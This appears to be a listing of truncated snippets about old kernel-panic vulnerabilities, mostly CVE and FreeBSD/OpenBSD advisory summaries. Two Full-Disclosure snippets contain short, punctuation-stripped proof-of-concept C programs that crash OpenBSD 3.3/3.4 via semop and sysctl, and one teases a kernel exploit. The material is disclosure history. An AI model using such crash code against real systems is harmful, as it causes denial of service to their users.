CVE-2004-0394

A "potential" buffer overflow exists in the panic function in Linux 2.4.x, although it may not be exploitable due to the functionality of panic...

CVE-2004-0370

The setsockopt call in the KAME Project IPv6 implementation, as used in FreeBSD 5.2, does not properly handle certain IPv6 socket options, which could allow attackers to read kernel memory and cause a system panic...

CVE-2004-1355

Unknown vulnerability in the TCP/IP stack for Sun Solaris 8 and 9 allows local users to cause a denial of service system panic via unknown vectors...

CVE-2004-0370

The CVE-2004-0370 issue affects FreeBSD 5.2 using the KAME IPv6 stack, where a programming error in setsockopt(2) handling of IPv6 socket options can allow a local attacker to read portions of kernel memory and cause a system panic. The vulnerability arises from improper validation in setsockopt(...

CVE-2004-0370

The setsockopt call in the KAME Project IPv6 implementation, as used in FreeBSD 5.2, does not properly handle certain IPv6 socket options, which could allow attackers to read kernel memory and cause a system panic...

FreeBSD Security Advisory FreeBSD-SA-04:06.ipv6

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ============================================================================= FreeBSD-SA-04:06.ipv6 Security Advisory The FreeBSD Project Topic: setsockopt2 IPv6 sockets input validation error Category: core Module: kernel Announced: 2004-03-29 Credit...

setsockopt(2) IPv6 sockets input validation error

From the FreeBSD Security Advisory: A programming error in the handling of some IPv6 socket options within the setsockopt2 system call may result in memory locations being accessed without proper validation. It may be possible for a local attacker to read portions of kernel memory, resulting in...

CVE-2003-0368

Nokia Gateway GPRS support node GGSN allows remote attackers to cause a denial of service kernel panic via a malformed IP packet with a 0xFF TCP option...

CVE-2003-0175

SGI IRIX before 6.5.21 allows local users to cause a denial of service kernel panic via a certain call to the PIOCSWATCH ioctl...

CVE-2003-0368

CVE-2003-0368 affects the Nokia Gateway GPRS Support Node (GGSN, IP650-based). The issue allows a remote attacker to trigger a kernel panic/DoS by sending a malformed IP packet containing a TCP option 0xFF. Impact is a restart of the GGSN and disruption of connectivity. Mitigation provided by Nok...

CVE-2003-0175

CVE-2003-0175 affects SGI IRIX prior to 6.5.21 via the PIOCSWATCH ioctl: a local attacker can crash the kernel (DoS). CERT/CC and NVD confirm this is a local-denial condition caused by invoking PIOCSWATCH in user space. Vendor guidance (SGI advisory 20030603-01-P) recommends upgrading to IRIX 6.5...

CVE-2003-0175

SGI IRIX before 6.5.21 allows local users to cause a denial of service kernel panic via a certain call to the PIOCSWATCH ioctl...

CVE-2003-0368

Nokia Gateway GPRS support node GGSN allows remote attackers to cause a denial of service kernel panic via a malformed IP packet with a 0xFF TCP option...

[Full-Disclosure] yet another panic() in OpenBSD

a project lacking the basic QA and unit testing and here is the outcome: include stdio.h include sys/types.h include sys/sem.h include sys/ipc.h int main int i; fori = 0; i 0x40; i++ semopi, struct sembuf NULL, 0; PANIC in OpenBSD 3.3 and 3.4 is confirmed. Full-Disclosure - We believe in it...

CVE-2003-0955

OpenBSD kernel 3.3 and 3.4 allows local users to cause a denial of service kernel panic and possibly execute arbitrary code in 3.4 via a program with an invalid header that is not properly handled by 1 ibcs2exec.c in the iBCS2 emulation compatibcs2 or 2 execelf.c, which leads to a stack-based...

OpenBSD 3.33.4 - semctlsemop Local Unexpected Array Indexing

OpenBSD 3.33.4 - semctlsemop Local Unexpected Array Indexing // source: https://www.securityfocus.com/bid/9086/info A local OpenBSD kernel vulnerability has been discovered when handling the semctl and semop system calls. The problem specifically occurs due to improper sanity checking before...

OpenBSD 3.3/3.4 - semctl/semop Local Unexpected Array Indexing

// source: https://www.securityfocus.com/bid/9086/info A local OpenBSD kernel vulnerability has been discovered when handling the semctl and semop system calls. The problem specifically occurs due to improper sanity checking before handling a user-supplied semaphore set. It is said that this coul...

[Full-Disclosure] OpenBSD kernel panic, yet still O*BSD much worse than MS-DoS 6.0

ppl think "hey, local DoS sucks", therefore they are. i think "hey, obsd sucks", therefore i am. include stdio.h include sys/param.h include sys/sysctl.h int main unsigned int blah2 = CTLKERN, 0 , addr = -4096 + 1; return sysctl blah, 2, void addr, &blah1, 0, 0; it's wide, it's opened, it's surel...

OpenBSD 3.3/3.4 - 'sysctl' Local Denial of Service

// source: https://www.securityfocus.com/bid/9073/info A denial of service vulnerability has been reported for OpenBSD, specifically when handling malformed calls to sysctl. By invoking systcl and passing a specific flag in conjunction with a negative argument may trigger a kernel panic. This cou...

OpenBSD kernel holes ...

once again i am honored to present you a generic and robust way to own OpenBSD 2.x-3.x, enjoy ; it is quite funny to name ring 0 overflow patches as "reliability fixes". who does theo thinks he is fooling ? kiddies in his cult ? you can patch your useless/old openbsd systems by visiting;...